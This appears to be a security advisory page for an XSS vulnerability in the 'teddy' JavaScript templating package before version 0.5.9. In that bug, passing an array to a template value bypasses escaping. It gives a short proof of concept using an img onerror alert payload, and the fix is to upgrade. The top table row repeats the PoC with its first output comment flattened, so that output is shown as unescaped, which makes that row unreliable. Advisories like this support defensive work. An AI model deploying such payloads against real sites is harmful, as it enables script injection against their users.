Vulnerability	Vulnerable Version
M Cross-site Scripting (XSS) teddy is a The most readable and easy to learn templating language there is! Affected versions of this package are vulnerable to Cross-site Scripting (XSS). A type confusion vulnerability can be used to bypass input sanitization when the model content is an array (instead of a string). PoC `const teddy = require("teddy") let r1 = teddy.render("<p>{escapeTest}</p>", {escapeTest: "<img src=x onerror='alert(1)' />"}) console.log(r1); // <p><img src=x onerror='alert(1)' /></p> let r2 = teddy.render("<p>{escapeTest}</p>", {escapeTest: ["<img src=x onerror='alert(1)' />"]}) console.log(r2) // <p><img src=x onerror='alert(1)' /></p>` How to fix Cross-site Scripting (XSS)? Upgrade `teddy` to version 0.5.9 or higher.	<0.5.9

Cross-site Scripting (XSS)

teddy is a The most readable and easy to learn templating language there is!

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). A type confusion vulnerability can be used to bypass input sanitization when the model content is an array (instead of a string).

PoC

const teddy = require("teddy")

let r1 = teddy.render("<p>{escapeTest}</p>", {escapeTest: "<img src=x onerror='alert(1)' />"})
console.log(r1); // <p>&lt;img src=x onerror=&#39;alert(1)&#39; /&gt;</p>

let r2 = teddy.render("<p>{escapeTest}</p>", {escapeTest: ["<img src=x onerror='alert(1)' />"]})
console.log(r2) // <p><img src=x onerror='alert(1)' /></p>

How to fix Cross-site Scripting (XSS)?

Upgrade teddy to version 0.5.9 or higher.

<0.5.9

Go back to all versions of this package